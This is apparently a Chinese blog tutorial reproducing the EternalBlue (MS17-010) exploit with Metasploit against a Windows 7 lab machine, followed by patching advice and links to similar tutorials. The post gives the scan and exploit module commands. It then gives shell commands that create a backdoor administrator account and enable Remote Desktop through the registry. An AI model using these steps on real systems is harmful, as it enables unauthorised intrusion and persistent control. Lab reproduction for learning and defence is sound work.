metasploit简单使用:复现永恒之蓝

已于 2022-03-05 16:50:28 修改
阅读量2.1k 收藏 6
点赞数
文章标签: 安全
于 2022-01-13 21:30:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45496593/article/details/122479441
版权

实验环境:

kali 192.168.153.135
win7 192.168.153.138

1、终端启动metasploit

sudo msfdb init && msfconsole
在这里插入图片描述

2、检测靶机是否存在ms17-010漏洞

(1)查找ms17-010相关模块

search ms17-010
在这里插入图片描述
(2)使用ms17-010扫描模块,对靶机Win7进行扫描

使用模块
use auxiliary/scanner/smb/smb_ms17_010
查看需要的配置
show options
在这里插入图片描述
设置目标IP
set rhost 192.168.153.138
在这里插入图片描述
执行扫描
run
在这里插入图片描述

3、漏洞利用

使用渗透模块
use exploit/windows/smb/ms17_010_eternalblue
查看可设置的选项
show options
设置渗透目标ip
set rhost 192.168.153.138
执行渗透
run
在这里插入图片描述
在这里插入图片描述
通过Shell对靶机Win7进行控制
创建用户名密码
net user cat cat /add
将用户cat添加入管理组
net localgroup administrators cat /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali远程桌面连接Win7
rdesktop 192.168.153.138
在这里插入图片描述
成功远程桌面连接
在这里插入图片描述

5、漏洞修复
(1)在线更新;开启Windows Update更新。
(2)打补丁。

北海北,南山南
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
metasploit复现永恒之蓝漏洞
weixin_46145442的博客
07-20 340
设备 内置metasploit的kali Linux; win7。 条件 两台主机在同一局域网下; 被攻击的win7已开启445端口: 445端口listening即可; 两台主机互相能ping通,如果win7能pingkali,但是kali ping不通win7,只需关闭win7防火墙即可。 复现 进入msf: 通过补丁代码查找对应攻击模块: 编号2的攻击模块即是我们要使用的。 我们使用这个模块: msf5 > use exploit/wi...
metasploit 下利用永恒之蓝攻击靶机win7
weixin_34061482的博客
01-20 1634
实验环境:一台win7靶机,kali作为攻击机 控制台下输入msfconsole search ms17-010 use exploit/windows/smb/ms17_010_eternalblue 接下来可以看一下受这个漏洞影响的操作系统 可以看出受影响的有两个,分别是win7和server 2008 R2两种操作系统(ps:这两款靶机都可以自己搭建一...
使用Kali Linux Metasploit复现永恒之蓝
xujing19920814的博客
10-01 5338
使用Kali Linux Metasploit复现永恒之蓝
利用Metasploit实现永恒之蓝漏洞复现
zxffdfh的博客
08-07 240
通过本次实验我了解到了Linux系统里面自带了很多有用的工具,例如Metasploit,使复杂的漏洞攻击简单化。我还了解到利用Metasploit实现漏洞攻击的步骤一般为:打开模块-配置模块-运行模块。
metasploit(msf)复现MS17-010(经典的永恒之蓝)SMB漏洞
zsisle的博客
07-13 2204
MS17-010漏洞:恶意代码会扫描开放445文件共享端口(SMB)的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。...
0x20.第二十课 MetaSploit检测并复现永恒之蓝.pdf
06-24
0x20.第二十课 MetaSploit检测并复现永恒之蓝.pdf
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透测试是一种重要的网络安全评估方法...对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至关重要。同时,测试报告的编写也是整个过程的成果展示,为防御者提供了改进安全策略的依据。
永恒之蓝测试.docx
07-23
"Kali 永恒之蓝测试指南" 在这篇文章中,我们将详细介绍 Kali Linux 中的永恒之蓝测试步骤,适合新手观看。永恒之蓝是 Windows 操作系统中的一个漏洞,通过这个漏洞,可以远程控制目标主机。 Nmap 扫描 首先,...
小计一次永恒之蓝实战
08-20
一次局域网内的永恒之蓝实战,msf的一次小实战。
metasploit-framework:Metasploit框架
02-04
Metasploit Metasploit框架以BSD样式的许可证发布。 有关更多详细信息,请参见。 该软件的最新版本可从以下网站获得: : 错误跟踪和开发信息可以在以下位置找到...使用Metasploit Metasploit可以做各种事情。 您要
metasploit对 ms17-010永恒之蓝漏洞利用
qq_38348692的博客
08-09 969
使用kali 对网段进行扫描,加载扫描模块: msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.15.1/24 rhosts => 192.168.15.1/24 msf5 auxiliary(scanner/sm...
漏洞工具】Metasploit框架永恒之蓝
孤桜懶契
06-19 339
MSF - 爆破模块 环境http://www.phpstudy.net 查找爆破模块的姿势 1、查找服务名 search type:auxiliary ssh 2、查找服务器+关键词 3、 SSH密码爆破 4、Mysql密码爆破 5、phpmyadmin登陆验证爆破 案例:phpMyAdmin爆破实操 环境http://59.63.200.79:8805/phpmyadmin/ ...
metasploit初体验(永恒之蓝
陆总的博客
01-14 374
一、准备工作: 1、资源准备: 环境(两台虚拟机): 攻击机(kali):192.168.99.131 目标机(win 7):192.168.99.128,含有(CVE-2017-0144 )漏洞。 2、通信准备:需要让攻击机与目标机能够相互通信(ping通),如果无法ping通可以如下设置。 准备好之后就可以正式开始了。 二、开始入侵: 步骤:开启metaspolit应用→查找漏洞辅助模块→使用漏洞辅助模块→设置允许辅助模块参数→执行辅助模块检测是否成功→查找漏洞利用模块→使用漏洞利用模块
Metasploit的Docker安装及其Eternal Blue(永恒之蓝)渗透实现
Mi1k7ea
08-11 7696
在Docker上pull下来的msf是默认已带有ms17_010_eternalblue利用模块的,这里就简单地演示一遍该模块来获取win7的shell。 Pull并安装msf容器: 先查找docker上的Metasploit镜像: docker search metasploit 选择第一个pull就好: docker pull linuxkonsult/kali-metasp
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 4479
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
Zichel77的博客
10-06 2489
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用。这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。Windows下IP地址为192.168.92.136。就可以看到windows7电脑中新建了这么个文件。看到WIN才说明利用成功,FAIL就是失败。使用的是nmap模块,输入命令进行扫描。开启了两台虚拟机,保证在同一网段下。两台虚拟机在同一网段,故可保持通信。我没这个病毒就不传了哈哈哈哈哈。
Metasploit简单使用——复现永恒之蓝漏洞
qq_29566629的博客
03-03 134
介绍的很好,转载
渗透测试工具-Metasploit使用复现永恒之蓝漏洞
weixin_53440207的博客
02-23 1046
metasploit使用以及复现永恒之蓝漏洞
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
最新发布
xnxqwzy的博客
02-23 3158
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
metasploit永恒之蓝
05-24
永恒之蓝是一个漏洞,它是由美国国家安全局...Metasploit是一个渗透测试工具,可以使用它来利用永恒之蓝漏洞进行攻击。但是请注意,攻击是违法行为,严重违反了网络安全法规定。建议您不要进行未经授权的攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值